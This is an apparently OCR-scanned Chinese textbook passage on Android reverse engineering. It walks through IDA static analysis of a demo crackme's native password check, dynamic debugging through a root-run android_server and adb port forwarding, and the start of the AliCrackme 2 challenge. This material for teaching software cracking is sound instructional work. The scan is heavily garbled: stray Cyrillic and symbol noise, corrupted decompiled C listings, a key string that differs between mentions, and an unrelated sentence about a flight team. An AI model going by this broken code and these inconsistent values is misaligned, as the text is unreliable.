BLA strlen Af +L LIN EE Ja Жү ñi BT {р Hm — P = 
BLX nalloc hr 一 BL 等 指令 调用 晒 效 的 时 候 ， 之 击 一 般 都 是 用 
- RI, RS 5 ас MOV 指令 来 传递 参数 值 ， 比 如 这 里 的 R5 里 
cr epy эы " Р" ъа, 
HOU ко, R5 A 面 存储 的 就 是 strlen PA У >, КОҢ az is 
Re. locret EEC number 函数 的 参数 。 这 样 分 析 之 后 ， 在 后 面 的 


моу RO, R5 @— 2) zx Va] EI) А Н] EAS] рК АУ O CH, 


BL get encrypt str 


HOU R1, КӨ ; <24Ф — 这 样 就 能 得 到 一 些 重 要 信息 


LDR R8, -(aSsbcqpbssp - 8xEDA) 
арр R8, РС ; "ssBCqpBssP' 
BL XN strcmp 


在 每 次 调用 有 返回 值 的 函数 之 后 的 售 令 ， 一 般 都 是 比较 指令 ， 比 如 CMP、CBZ， 或 者 是 strcmp 等 ， 如 上 面 代 码 最 后 一 行 。 
这 里 是 破解 的 突破 点 ， 因 为 一 般 加 密 再 怎么 厉害 ， 最 后 比较 的 参数 肯定 是 正确 的 密码 (或 者 是 正确 的 加 密 之 后 的 密码 ) 和 输入 的 
密码 (或 者 是 加 密 之 后 的 输入 密码 ) ， 在 这 里 丈 可 以 得 到 正确 密码 ， 或 者 是 加 密 之 后 的 密码 。 


到 这 里 就 分 析 完 了 native 层 的 密码 比较 冰 数 : Java cn wjdiankong encryptdemo MainActivity isEquals. #1845 
的 ARM 指 令 看 的 吃力 ， 可 以 使 用 F5 键 ,查看 它 的 C 语 言 代 码 ， 如 下 所 示 : 


unsigned int _ fastcall Java cn wjdiankong encryptdemo HMainfictivity isEquals(JHIEnu wal, int a2, i 
i 
int 03; ZZ r701 
JNIEnu жуд; // rói1 
const char *u5; // r1 
const char уб; // 65081 
size t v7; // rei 
char *xu8; // rei 
unsigned int result; // r 081 
const char *u18; // reoa2 
int 011; // ra2 


u3 = аз; 

u^ = al; 

v5 = (const char *)((int (*)}(void))(*81)->GetStringUTFChars)(); 
об = u5; 

у? = strlen(u5); 

v8 = (char *)malloc(u?7); 


strcpy(u8, уб); 


result =s number(u6); 
if ( result ) 


{ 
u1Ü = (const char mjet encrypt str(w6); | 
ull = strcmp("ssBCGqpBSSP”, UTO); 
((void { fastcall *)(JHIEnu *, int, const char #*))(xu4)->ReleasesStringUTFChars)(u4，u3，u6) ; 
result = _ clz(u11) >> 5; 
> 


return result; 


:is_numbet 函 数 ， 这 个 函数 看 名 字 就 能 猜 到 是 判断 是 不 是 数字 ， 可 以 使 用 F5 键 ， 查 看 它 对 应 的 C 语 言 代 码 ， 如 下 所 示 : 


signed int _ Fastcall is number(signed int result) 
i 

int vi; ZZ r Ba2 

int v2; // r3@3 

int v3; // 1103 


if ( result ) 
i 
ul = result - 1; 
while ( 1 ) 
4 
v3 *( BYTE *)(ul++ + 1); 
u2 = u3; 
if ( tu3 ) 
break; 
if ( (unsigned int)(u2 - 48) > 9 ) 
return 8; 


H 

result = 1; 
; 
return result; 


H 


这 里 简单 一 看 ， 主 要 是 看 return 语 句 和 if 济 断 语句 ， 看 到 这 里 有 一 个 循环 ， 然 后 获取 _BYTE* 这 里 地 址 的 值 ， 并 且 目 增加 一 ， 
然后 存 到 v2 中 ， 如 果 v3 为 \0' 的 话 ， 束 结束 循环 ， 然 后 做 一 次 判断 ， 束 是 v2-48 是 否 大 于 9， 那 么 这 里 知道 48 对 应 的 是 ASCII 中 的 
数字 0， 所 以 这 里 可 以 确定 : 用 一 个 循环 声 历 _BYTE* 这 里 存 的 字符 串 是 否 为 数字 串 。 


get_enctypt_stt 函 数 ， 这 个 函数 看 到 名 字 就 可 以 猜测 ， 它 是 获取 输入 的 客 码 加 密 之 后 的 值 ， 再 次 使 用 F5 快 捷 键 查看 对 应 的 C 
语言 代码 ， 如 下 所 示 : 


const char * fastcall get_encrupt_str(COnsSEt char *result) 
{ 

const char x*u1; // кща1 

size t v2; // r02 

int v3; // ry@2 

int u^; // r5@2 

const char xi; // r2@2 

int уб; // t1 

int v7; // r304 


v1 = result; 
if ( result ) 


u2 strlen(result); 

u3 (int)(u1 - 1); 

uh = u2 + 1; 

result = (Const char *x)malloc(u?2 + 1); 
for ( i = result; i - result < уд; ++i ) 


{ 
уб = *( BVTE *)(u3++ + 1); 
о? = уб - 48; 
if ( v6 == 48 ) 
u? = 1; 
xi = keu_src[18 - v7]; 
; 
x(( BYTE *)i + 1) = Ө; 


} 


return result; 


; 


Ес T ifiS 8), FBaERUTEEER)ZXIGESS/JNULL. АЈА, Н ЫБ]; 不 是 的 话 ， 使 用 strlen 阔 数 获取 字符 串 的 长 
度 保存 天 v2 中 ， 然 后 使 用 malloc 申 请 一 块 堆 内 存 。 首 指针 保存 到 result， 大 小 是 v2+1， 也 束 是 传递 进来 的 字符 串 长 度 +1， 然 后 
就 开始 进入 循环 。 首 指针 result， 赋 值 给 指针 ， 开 始 循环 ，Vv3 是 通过 v1-1 获 取 到 的 ， 就 是 函数 传递 进来 字符 串 的 地 址 ， 那 么 v6 
束 是 获取 传递 进来 字符 串 的 字符 值 ， 然 后 减 去 48， 赋 值 给 v7。 

可 以 猜 到 了 ， 这 里 想 做 字符 转化 ， 把 char 转 化 成 int 类 型 。 继 续 往 下 看 ， 如 果 v6==48 的 话 ，V7=1， 也 融 是 这 这 里 如 果 遇 到 
字符 '0'， 就 赋值 {。 看 到 .上面 得 到 的 v7 值 ， 被 用 来 取 key_src 数 组 中 的 值 ， 那 么 这 里 双击 key_src 变 量 ， 就 跳 转 到 了 它 的 值 地 方 。 
果不其然 ， 这 里 保存 了 一 个 字符 数组 ， 看 到 它 的 长 度 正好 是 18， 如 下 代码 所 示 ， 那 么 应 该 明白 了 ， 这 里 通过 传递 进来 的 字符 
串 ， 循 环 遍 历 字符 串 ， 获 取 字 符 ， 然 后 转化 成 数字 ， 再 倒序 获取 key _src 中 的 字符 ， 保 存 到 result 中 。 然 后 返回 。 

.data: 888836884 ENPORT key src 


„даса: 80003 803 key src DCB '"zuturTRñ=BniqC(PpUs'',0 ; DATA XREF: get encrypt str+2610 
-data: 88883686054 ; .got:key src ptrio 


-data: 88883817 ALIGN 4 


这 两 个 重要 消 数 的 功能 为 ， 一 个 是 判断 输入 的 内 容 是 否 为 数字 字符 串 ， 一 个 是 通过 输入 的 内 容 获 取 密 码 内 容 ， 然 后 和 正确 的 
加 密 密 码 ssBCqpBssP 进 行 比较 。 


22.3.2 ”用 IDA 进 行 调试 设置 


本 节 融 用 动态 调试 万 法 来 跟踪 传 入 的 字符 串 值 ， 以 及 加 密 之 后 的 值 。 看 到 打印 log 的 函数 ， 很 难关 道具 体 的 参数 和 寄 仔 器 的 
值 ， 所 以 这 里 需要 开始 调试 ， 得 知 每 个 函数 执行 之 后 的 寄 仓 器 的 值 ， 在 用 IDA 进 行 调试 so 的 时 候 ， 需 要 以 下 准备 步骤 。 


1. 获 取 android server 4f 


在 IDA 安 装 目 录 \dbgsrwandroid server， 如 图 22-13 所 示 。 


本 地 磁盘 (С) Program Files (x86) к IDA 6.8 k dbgsry 


=} 修改 日 期 


| | android server 2015/4/13 18:35 
|, | android server nonpie J015/4/13 18:35 
| | armlinux server 2015/4/13 18:35 
| | armuclinux server 2015/4/13 18:35 
8 ida kdstub.dil 2015/4/13 18:35 
| | linux server 2015/4/13 18:00 
| | linux serverx64 2015/4/13 18:00 
| | mac server J015/A4/13 18:35 
| | mac serverxb4 J015/4/13 18:35 


п] win32, remote.exe 2015/4/13 18:35 
CHI win4 remotex64A.exe J015/4/13 18:35 


“ы wince remote arm.dl| 2015/4/13 18:35 
EB wince remote tcp arm.exe J015/4/13 18:35 


422-13 android server 3x Ф 


D< SC EE РАЈЕ? 它 是 怎么 运行 的 呢 ? 下 面 来 介绍 一 下 。 在 前 一 章 中 介绍 了 关于 Android 中 的 调试 原理 ， 其 实 是 使 用 
gdb 和 gdbserver 来 做 到 的 ，gdb 和 gdbserver 在 调试 的 时 候 ， 必 须 注入 到 被 调试 的 程序 进程 中 。 但 是 非 root 设 备 的 话 ， 注 入 别 
的 进程 中 只 能 借助 于 run-as 这 个 命令 。 也 就 是 说 如 果 要 调试 一 个 应 用 进程 的 话 ， 必 须要 注入 它 内 部 ， 那 么 用 IDA 调 试 so 文 件 也 是 
这 个 原理 ， 需 要 注入 进程 才能 进行 调试 。IDA 有 类 似 于 gdbserver 这 样 的 工具 ， 那 就 是 android server， 需 要 运行 在 设备 中 ， 保 
证 和 PC 端的 IDA 进 行 通信 ， 比 如 获取 设备 的 进程 信息 、 有 具体 进程 的 so 内 存 地 址 、 调 试 信息 等 。 


把 android server 保 存 到 设备 的 /data 目 录 下 ， 修 改 一 下 它 的 运行 权限 ， 然 后 必须 在 root 环 境 下 运行 ， 因 为 要 做 注入 进程 操 
作 ， 所 以 必须 要 root: 


C:NUsersNjiangweil-g>adb shell 

shell@pisces:/ 5 su 

root@pisces:/ # cd /data 

root@pisces:/data # ./android_server 

IDA Android 32-bit remote debug server (ST) v1.19. Hex-Rays (c) 2004-2015 
Listening on port #23946... 


注意 ， 这 里 把 它 放 在 了 /data 目 录 下 ， 然 后 是 ./android_server 命 令 ， 这 里 提示 了 IDA Android 32-bit， 所 以 后 面 在 打开 IDA 
的 时 候 一 定 要 是 32 位 的 IDA， 不 是 64 位 的 。1DA 在 安装 之 后 都 是 有 两 个 可 执行 的 程序 ， 一 个 是 32 位 ， 一 个 是 64 位 的 ， 如 果 没 打开 
正确 会 报 这 样 的 错误 ， 如 图 22-14 所 示 。 


Incompatible debugging server: 
address size 15 4 bytes, expected 4 


图 22-14 报错 信息 


还 有 一 类 问题 : error: only position independent executables (PIE) are supported 这 主要 是 Android 5.0 以 上 的 编译 
选项 默认 开启 了 pie， 在 5.0 以 下 编译 的 原生 应 用 不 能 运行 ， 有 两 种 解决 办 法 ， 一 种 是 用 Android 5.0 以 下 的 手机 进行 操作 ， 还 有 
一 种 束 是 用 IDA6.6+ 版 本 即 可 。 


б 


然后 开始 监听 了 设备 的 23946 端 口 ， 如 果 想 让 IDA 和 这 个 android server 进 行 通信 ， 必 须 让 PC 端的 IDA 也 连 上 这 个 端口 ， 
时 候 就 需要 借助 于 adb 的 一 个 命令 了 : 


adb forward tcp: 远 端 设备 端口 号 ( 进行 调试 程序 端 ) tcp: 本 地 设备 端口 ( 被 调试 程序 端 ) 
这 里 就 可 以 把 android server 端 口 转发 出 去 : 

C:NUsersNjJlanowe1l-g>adb forward tcp:23946 tcp:23946 

XAR, ЕРСИ ADAE LF239463x^imLIsbRILA Т. RESSA, ЖИТ лл Н УГ L1StbSE 239460? 


КУБАРА ЕЈ, АРА 1111588567, 9023946, БЈН КАР: android-server- 
p1234, 


HJLMssFinetstatáp < 2715112394683, Ea Eida 


C:NUsersNjiangweil-g>netstat -ano | findstr 23946 


TCE 1l127.0.0 1123986 UD; 0. 0S0 LISTENING 329905 
TOP 127.0.0.1:23946 L27.0.0.1:50713 ESTABLISHED 35906 
Tue p 127 Q. Q. L 567173 L24,9,09413239495 ESTABLISHED 1988 


C:NUSersNMjiangweil-g»tasklist | findstr 1988 
idaq.exe 1988 Console 1 68,368 K 


C:NUsersNMjiangweil-g» 
2.1DA 获 取 进 程 信息 
上 面 准备 好 了 android server， 运 行 成 功 ， 下 面 就 用 IDA 进 行 尝试 连接 ， 获 取信 息 ， 进 行进 程 附加 注入 。 这 时 候 需 要 册 打 开 


一 个 IDA， 之 前 打开 一 个 1DA 是 用 来 分 析 so 文 件 的 ,一 般 用 于 充 仿 分 析 ， 要 调试 so 的 话 ， 需 要 再 打开 一 个 1DA。 这 里 一 般 都 是 需 
要 打开 两 个 IDA， 也 叫 作 双开 IDA 操 作 ， 采 用 动静 结合 荣 略 ， 如 图 22-15 所 示 。 


| r IDA: Quick start 一 一 - 


Disassemble a new file 


Load the old disassembly 


图 22-15 “双开 IDA 
这 里 记得 选择 Go 这 个 选项 ， 融 是 不 需要 打开 so 文件 了 ， 进 入 一 个 空 晶 页， 如 图 22-16 所 示 。 


在 Debugger 选 项 卡 中 选择 Attach， 看 到 有 很 多 debugger， 可 见 IDA 工 具 真 的 很 强大 ， 做 到 很 多 debugger 的 兼容 ， 可 以 调 
试 很 多 平台 下 的 程序 。 这 里 选择 Android debugger， 出 现 页 面 如 图 22-17 所 示 。 


记得 ， 这 里 要 选择 ~ ee 
Android Debugger pea 
这 里 我 们 可 以 看 到 还 Remote Мас OS X debugger 


Remote Symbian debugger 


п] 以 选 TÉ bdb, IDA EH Remote WinCE debugger 


Remote WinCE debugger (TCP/IP) 


的 很 强大 可 以 支持 多 种 | Remote Windows debugger 


Replayer debugger 


% Р УП] debugger Windbg debugger 


| Remote Linux debugger 


图 22-16 ”选择 Debugsget 选 项 


Hostname { 12z!.U.U. 


Password 


x HL om ЫЕ Г, 
Save network zettings as default 个 能 进行 修改 


图 22-17 设置 端口 


这 里 可 看 到 端口 是 23946， 所 以 上 面 用 adb forward 进 行 端 口 转发 的 时 候 是 23946。 这 里 PC 本 地 机 就 是 调试 端 ， 所 以 host 就 
是 本 机 的 ip 地 址 : 127.0.0.1， 点 击 OK， 出 现 界面 如 图 22-18 所 示 。 


P Choose process to attach to 


Name 


[32] /data/data/com.tencent.mtt/files/daemon exe /data/data/com.tencent.mt... 
[32] /system/bin/debuggerd 

[32] com.aihoo.browser 

[32] /sbinf/ueventd 

[32] lagcat -v lang 

[32] /system/bin/sh - 

[32] su 


Line 6 of 113 


图 22-18 ”进程 信息 列表 
可 以 看 到 列 出 了 设备 中 所 有 的 进程 信息 ， 其 实 都 是 android server 王 的 事 ， 获 取 设 备 进 程 信息 传递 给 IDA 进 行 展 示 。 
注意 ， 如 果 当 初 没有 用 root 身 份 去 运行 android_server : 
C:NUsersNjiangweil-g>adb shell 
shell@pisces:/ $ su 
root@pisces:/ # cd /data 


root@pisces:/data # ./android_server 
IDA Android 32-bit remote debug server (ST) v1.19. Hex-Rays (c) 2004-2015 


Listening on port #23946... 
1DA 残 不 会 列举 出 设备 的 进程 信息 ， 如 图 22-19 所 示 。 


eo» Choose pracess to attach to 


[32] logcat -v lonc 


[32] /system/bin/sh - 


Line 1 of 2 


22-19 ”无 进程 列表 信息 
还 有 一 个 注意 的 地 方 ， 惑 是 IDA 和 android server 版 本 一 定 要 保持 一 致 。 


可 以 用 Ctrl+F 快 捷 键 搜索 需要 调试 的 进程 ， 这 里 必须 运行 要 调试 的 进程 ， 不 然 也 是 找 不 到 这 个 进程 的 ， 如 图 22-20 所 示 。 


在 这 里 可 以 快速 搜索 


我 们 需要 幸运 的 进程 


图 22-20 ”搜索 进程 


双击 进程 ， 即 可 进入 调试 页 面 ， 如 图 22-21 所 示 。 


File Edit Jump Search View Debugger Options 


= | а 


» m ü гет  ARMLinux/Androi d debugger Y 


Library function Data MW Regular function P Unexplored Bl Instructi: 


Debug View 


Т IDA Vi ew-PC 


гана шз "за аа Oooo "a3 iii шшш RER а 


 llibc.so: 4010C717 DCB BxE3 ; 
^ libc.so:5nB1BC718 DCB мъж El. р 
libc.so:^4818C719 DCB | р ТТЕ 


` libc.so:5B18C710ñ DCB 
x libc.so:5618C71B DCB BxEF = lbc.so BUE 


= 1ibc.so:^5818C728 | RO, #0x1000 
libc.so:4010C724 BXL LR 


libc.so:4010C728 RS RB, RB, HD 


libc.so:^818C72C sub ^48128D7^ 
libc.so:^818C72C 

libc.so:5818C738 inotify init DCB 
libc.so:^5818C731 DCB 80xC8 
libc.so:^5818732 DCB BxñD 
libc.s0:54818C733 DCB BxE1 
libc.so:^818C734 DCB 8xhF 
libc.so:^5818C735 DCB 8x7F 


图 22-21 进入 调试 页 面 


为 什么 会 断 在 libc.so 中 呢 ? Android 系统 中 libc 是 c 层 中 最 基本 的 为 数 库 ，libc 中 封 芝 了 io、 文 件 、socket 等 基本 系统 调用 。 
所 有 上 层 的 调用 都 需要 经 过 libc 封 装 层 。 所 以 libc.so 是 最 基本 的 ， 所 以 会 断 在 这 里 。 而 且 一 些 澡 用 的 系统 So， 比如 linker， 如 图 
22-22 所 示 。 


422) Choose segment to jump. 


| sl linker 
ав |inker 
" ав |inker 


图 22-22 linker x44 


jx inkerz FH Eso A ERSSER, BhLAIEBESGSTRDTE.init array& КЛА, XE8— 1 sislibdvm.soxft, CAAT 
dvm 中 所 有 的 底层 加 载 dex 的 一 些 方法 ， 如 图 22-23 所 示 。 


Name Start 


45| libdvm.so 415D 7000 4167Е000 
as libdvm.so 4167F000 41682000 
ЗР 


libdvm.so 41682000 41692000 


libd»m 


图 22-23 libdvm.sox 1} 


在 后 面 动 态 调 试 需要 dump 出 加 密 之 后 的 dex 文 件 ， 就 需要 调试 这 个 so 文件 了 。 


3. 找 到 淫 数 地 址 下 断后 


使 用 Ctrl+ S 快 捷 键 找到 需要 调试 so 的 基地 址 : 74FE4000， 如 图 22-24 所 示 。 


[Ж] Choose segment to Jump 


cn.w]diankong.encryptdem... 
cn.wjdiankong.encryptdem... 


libencrypt.sa 
libencrypt.so 


cn.wjdiankong.encryptdem... 
datatappü&icnw|jdiankong... 


7AFE7000 
7AFFA000 
74FFD000 


End 


74FAF000 
74FE3000 

1 «10.020 
74FE7000 
74FE8000 
74FFD000 
75300000 


== I о g 


55558555 р 


" 


一 


图 22-24 查找 基地 址 


然后 通过 另外 一 个 IDA 打 开 so 文 件 ， 玛 看 函数 的 相对 地 址 : E9C， 如 下 所 示 : 


-text-0080080E9C 
.Lext:08088E9C EXPORT Јауа cn vjdiankong encryptdemo HMainfictivity isEquals 


text:88880E9C Jua cn vjdiankong encryptdemo Hainfictiuity isEquals 
text: 88888E9C PUSH {R3-R7 ,LR> 


.text:88888E9E MOU R1, R2 
.text:88888ER8 LDR R3, [R8] 
.text:88888ER2 MOU R7, R2 
.text:88888ER^ HOUS R2, #0 
.Ltext : 88888ER6 MOU R6, R8 


那么 得 到 了 函数 的 绝对 地 址 就 是 : 74FE4E9C， 使 用 G 键 快速 跳 转 到 这 个 绝对 地 址 ， 如 图 22-25 所 示 。 


А Jump to address 


Титр address  TlAFEAESUL 


ж J| ce ][ кь] 


图 22-25” 跳 转 到 绝对 地 址 


跳 转 这 个 地 址 之 后 ， 开 始 下 断 点 ， 点 击 最 左边 的 绿色 辆 点 即 可 下 断 点 ， 如 下 所 示 : 


libencrypt .so:74FE4E9C Java cn wjdiankong encruptdemo Mainñctiuitu isEquals 


libencrypt.so:7h5FEhE9E MOU R1, R2 
libencrypt.so:75FEhERGB LDR R3, [R8] 
libencrypt.so:75FEAhER2 MOU R7, R2 


Hle Edit Jump £ 


p и | [Remote А 


然后 点 击 左 上 角 的 绿色 三 角 按钮 运行 ， 也 可 以 使 用 F9 键 运行 程序 。 


所 击 程序 中 的 按钮 ， 如 图 22-26 所 示 。 


ЦЕ. 


图 22-26 ”点 击 程序 中 的 按钮 
触 友 native 国 数 的 运行 ， 如 下 所 示 : 


I libencrupt. .50:73ҒЕЗЕ9С Jaua cn wjdiankong encryptdemo Mainfictiuityu isEquals ` 


libencrypt.so:74FE4E9E MOU R1, R2 
ibencrypt.so-:7h5FEhEAB LDR R3, [R0] 
libencrupt.so:74FE4EA2 MOU R7. R2 


进入 调试 阶段 了 ， 这 时 候 可 以 使 用 F8 快 捷 键 进行 单 步调 试 ， 用 F7 进 行 单 步调 试 ， 如 下 所 示 : 


libencrypt .so:74FE4EBA BLX unk 74FE4DAC 
libencrypt .so:74FE4EBE MOU R8, R5 
is питіје ШШШ 

libencrypt .so:74FE4EC4 CBZ RO, R0=debug127:75759FD0 
libencrypt.so:75FEhECÓ MOU R8, DCB 8x31 
libencrypt .so:74FE4ECS8 BL get pcB 0x32 } 2 3m. " 

. : H `Y 
libencrypt .so:74FEMECC MOU R1, осв 0x33 | з 刚刚 前 人 态 分 析 的 时 候 知 道 了 RO LEER 
libencrypt .so:74FE4ECE LDR R8, DCB 80x35 4 | | - TOT 
libencrypt.so:7hFENEDG ADD R8, DCB 0x35 ] 5 is number 的 人口 参数 ， 这 里 这 们 查看 
libencrypt .so:74FE4ED2 ВІХ unk DCB 60x36 6 
libencrypt .so:74FE4ED6 LDR R3, DCB 0 RO 5 \ EL. 123456 pi Ei ava Iz 
libencrypt .so:74FE4EDS8 HOU R1, DCB өхлв 1 (а аай: , 就 是 J E 
libencrypt .so:74FE4EDA MOU R2, DCB 0x18 nd H i 11 
libencrypt.so:74FE4EDC LDR.W R3, DCB | ТО ЛАЧ 
lihenrcrunt сп - 7АҒҒАҒҒЯ MNU RA. 


点 击 F8 进 行 单 步调 试 ， 到 达 is_ питрегра& 19/85, AEREA, RILUEPSROSSIZESBIPJES, EAE SUE 
123456， 这 个 就 是 Java 层 传 入 的 密码 字符 串 。 接 着 往 下 走 ， 如 下 所 示 : 


返回 值 保存 在 RO 中 的 是 1, 
libencrypt .so:74FE4EC6 MOU R8, R5 
libencrypt .so:74FE4ECS8 BL get R8-80880881 | 不 等 于 0, 不 进 "zi 了 了 中转 


这 里 把 is_ number 遂 数 返 回 值 保 存 到 R0 寄 存 中 ， 然 后 调用 CBZ 指 令 ， 判 断 是 否 为 0， 如 果 为 0 就 跳 转 到 locret 74FE4EEC 处 ， 
查看 RO 寄存 器 的 值 不 是 0， 继 续 往 下 走 ， 如 图 22-27 所 示 。 


PC 
libencrypt .so:7h4FE4ECE LDR R8, -(aSsbcqpbssp - BxZMFEHE 
libencrypt.so:7h5FEhEDG8 арр uu Ri-libencrypt.so:key srcj 
libencrypt.so:75FEhED2 BLX unk -key src ОСВ 57а ; 2 
libencrypt.so:75FEhEDó LDR R3, DCB 8x79 
libencrypt.so:7h&FEhEDS MOV R1, DCB 0x75 
libencrypt.so:754FEhEDR MOUV R2, DCB 0x79 - 
libencrypt.so:?7h&FEMEDC LDR.W H3, рсв 0x72 
libencrypt.so:754FEhEEG HOV Rh, DCB gx54 
libencrypt.so:7h5FEhEE2 MOUV RB, DCB üx52 | 
libencrypt.so:7h5FEhEE^ BLX R3 DCB Oxid ` 


DCB 8x2 
UNKNOWN 74FE4ECC: Java cn wjdiankong encryptdemo рор 9x42 


= Hex n ew-1 


ox DID Uc + 


5]5 00 00 08 88 DB 00 00 08 08 Т. 08 05 00 М 


这 里 通 过 调用 get encrypt str 图 数 ， 将 返回 值 保 存 到 кож 
ff iB, RIJE AEE RO % f ña BJ TE. Н] LA ЯА А. Н) > 
123456 一 zytyrTRA*B 了 


图 22-27 ”查看 寄存 器 值 


看 到 了 get encrypt str 国 数 的 调 有 用， 函数 的 返回 值 保 仓 在 R1 寄 仔 器 中 ， 查 看 内 容 为 : zytyrTRA^B, 85/82), ЕЕ 
的 : 123456 一 zytyrTRA*B， 前 面 静态 分 析 了 get encrypt str 函数 的 逻辑 ， 继 续 往 下 看 ， 如 下 所 示 : 


1ibencrupt .so:74FE4EDG ADD R8, PC ; "SSBCqpBssP'"' 

libencrypt .so:74FE4ED2 BLX unk 74FE4DBS8 

libencrypt .so:74FE4ED6 LDR R3, [R6] Ж 

libencrypt .so:74FE4ED8 MOU R1, R7 这 里 得 到 加 密 之 后 的 内 容 和 
libencrypt .so:74FE4EDA MOU R2, R5 

libencrypt.so:7hFEhEDC LDR.W кз, [R3,#0x2A8] IF f/f ВУ 25 10 :ssBCqpBssP iH 
libencrypt .so:74FE4EEQ@ MOU R^, R8 - " 

libencrypt.so:7hFEMEE2 MOU R8, R6 行 比 较 

libencrypt .so:74FE4EE4 BLX R3 

libencrypt .so:74FE4EE6 CLZ.W R8, R4 


这 里 把 上 面 得 到 的 字符 串 和 ssBCqpBssP 作 比较 ， 那 么 gsBCqpBssP 就 是 正确 的 加 密 密 码 了 。 那 么 现在 的 资源 是 : 正确 的 加 
密 密 码 为 ssBCqpBssP， 加 密 密 钥 库 为 zytyrTRA*BnigqCPPVs， 加 密 逻 辑 为 get encrypt str, 


可 以 写 一 个 逆向 的 加 密 方法 ， 去 解析 正确 的 加 密 密 码 得 到 值 即 可 。 为 了 给 大 家 一 个 破解 的 机 会 ， 这 里 就 不 公布 正确 答案 了 。 
加 密 apk 下 载 地 址 : 


http://download.csdn.net/detail/jiangwei0910410003/9531638 
22.3.3 ”IDA 调 试 的 流程 总 结 


到 这 里 ， 融 分析 了 如 何 破解 apk 的 济 程 ， 下 面 来 总 结 一 下 : 

1) 通过 解压 apk 文 件 得 到 对 应 的 so 文件 ， 然 后 使 用 IDA 工 具 打 开 so 文 件 ， 找 到 指定 的 native 层 函数 。 

2) 通过 IDA 中 的 一 些 快捷 键 : F?、Ctrl+9、Y 等 ， 静 态 分 析 阔 数 的 ARM 指 令 ， 大 致 了 解 函 数 的 执行 流程 。 
3) 再 次 打开 一 个 IDA 来 进行 调试 so 文件 。 


4) 将 IDA 目 录 中 的 android_ server 拷贝 到 设备 的 指定 目录 下 ， 修 改 android_ server 的 运行 权限 ， 用 root 身 份 运行 


android server, 
5) 使 用 adb forward 进 行 端 口 转发 ， 让 远程 调试 端 1DA 可 以 连接 到 被 调试 端 。 
6) 使 用 IDA 连 接 上 转 友 的 端口 ， 查 看 设备 的 所 有 进程 ， 找 到 需要 调试 的 进程 。 


7) 通过 打开 so 文件 ， 找 到 需要 调试 国 数 的 相对 地 址 ， 然 后 在 调试 页 面 使 用 Ctrl+ 找到 so 文件 的 基地 址 ， 相 加 之 后 得 到 绝对 
地 址 ,使 用 G 键 , 跳 转 到 遂 数 的 地 址 处 ， 下 好 断 操 。 点 击 运行 或 者 点 击 F9 键 。 
8) 触 友 native 层 的 函数 ， 使 用 F8 和 F 7 快捷 键 进 行 单 步调 试 ， 坦 看 天 键 的 寄存 器 中 的 值 ， 比 如 阔 数 的 参数 、 冰 数 的 返回 值 等 


总 结 : 在 调试 so 文件 的 时 候 ， 需 要 双开 IDA， 采 用 动静 结合 的 万 式 进 行 分 析 。 


224 ”用 IDA 解 决 肥 调试 问题 


到 这 里 就 结束 了 本 章 的 破解 旅程 了 ?答案 是 否定 的 ， 因 为 上 面 的 例子 其 实 是 自己 构建 的 ， 先 写 了 一 个 apk， 目 的 就 是 为 了 给 
大 家 演示 。 如 何 使 用 IDA 来 进行 动态 调试 so 文件 ， 下 面 用 一 个 操作 动手 的 案例 来 讲解 ， 这 个 案例 解决 了 反 调 试问 题 。 这 是 2014 
年 阿里 安全 挑战 赛 的 第 二 题 : AliCrackme 2。 


如 图 22-28 所 示 ， 下 面 来 看 看 破解 流程 。 首 先 使 用 aapt 命 令 查 看 其 AndroidManifest.xml| 文 件 ， 得 到 入 口 的 Activity 类 ， 如 
Кт: 


- sersNjiangweil-g\DesktopNhndroid 中 的 动态 调试 >aapt dump xmltree filiCrackme 2.apk findroidManifest.xml > р: мето. хе 


: Nisers Njiangveii- -g\DesktopMndroid 中 的 动态 调试 >start D: Ndemo .txt 


:NJsersNjiangueil-gNDesktopNñndroid rh 的 动态 调试 > 


TF SSE) 格式 (O) SEV) 帮助 (H) 


android=http://schemas. android. com/apk/res/android 
E: manifest (line=2) | mE 
А: android:versionCode(O0x0101021lb)-(type Ox10)0xl 
А: android:versionName(0x0101021c)-^1.0^ (Raw: 71.07) | 
А: package= com. yaotong. crac ckme" (Raw: "com. yaotong. crackme ) 
E: uses-sdk (line-7) | mE 
À: android:minSdkVersion(0x0101020c)- (type 0x10)0x8 
А: android:targetSdkVersion(0x01010270)- (type 0х10)0х13 
E: application (line-11) 
À: android: label(0x01010 001) -(0x7f010000 
À: android:icon(0x01010002) =00х7 #020001 
А: android:allowBa ckup (0x010102 80)= (+уре Ox12)Oxffffffff 
E: activity (line-15) 
А: android:label (0х01010001)=@0х7#0700( 
А: android:name(0x01010003)-7[. у: 
E: intent-filter (line-18) 
E: action (line-19) | | 
А: android:name(0x01010003)=”android. intent. action. MAIN” (Raw: "android.intent. action. MAIN”) 
E: category (line-21) | | | 
А: android:name (0х01010003)=”апаго14. intent. category. LAUNCHER” (Raw: “android. intent. category. LAUNCHER”) 
E: activity (line-24) | | 
А: апдгоі4: папе (0х01010003)=”сот. yaotong. crackme. Result&ctivity" (Raw: "com. yaotong. crackme.ResultActivity”) 


, ⁄ ~ . . . AAN 
у | (Каю: соп. yaotong. crackme. Mainåctivity ) 


当 Bob 带 领 乌 河 飞行 队 赶 列 时 ‚ПОЗА {ЕЛШЕ 
p uenia TBHEIE, TE pr- tE 
化 为 成 爆 ， 唯 一 幸免 的 是 一 部 年 机 ， 但 需要 开机 束 届 。 


L, i 


[22-28 ”破解 程序 


然后 使 用 dex2jar 和 jd-gui 查 看 它 的 源码 类 com.yaotong.crackme.MainActivity， 如 下 所 示 : 


C:NUsersNjiangweil-g>cd C:NUsersNjiangweil-gNDesktopNAndroid 中 的 动态 调试 
Ndex2jar-0.0.9.15 


C:NUsersNVjiangweil-g NM Desktop M Android 中 的 动态 调试 \dex2jar-0.0.9.15>dex2jar 


classes.dex 
this cmd is deprecated, use the d2j-dex2jar if possible 


dex2jar version: translator-0.0.9.15 
dex2jar classes.dex -> classes dex2jar.jar 


Done. 


C:NUsersNjiangweil-gNDesktopMAndroid 中 的 动态 调试 \dex2jar-0.0.9.15> 


Е-@ сот.уаоіопа.сгаскте 
由 - 国 BuildConfig 


x - o inputCode : EditText 
| Es Ф onCreate(Bundle) : void 


package com.yaotong.crackme; 
@ import android.app.Activity; 


public class MainActivity extends Activity 
{ 

public Button btn_submit; 

public EditText inputCode; 


static 
{ 

System. loadLibrary("crackme"); 
} 


protected void onCreate (Bundle paramBundle) 

{ 
super.onCreate (paramBundle) ; 
setContentView (2130903040); 
getWindow().setBackgroundDrawableResource (2130837504) ; 
this.inputCode = ((EditText)findViewById (2131099648) ) ; 
this.btn submit = ((Button)findViewById (2131099649) ); 
this.btn submit.setOnClickListener (new View.OnClickListener () 


{ 
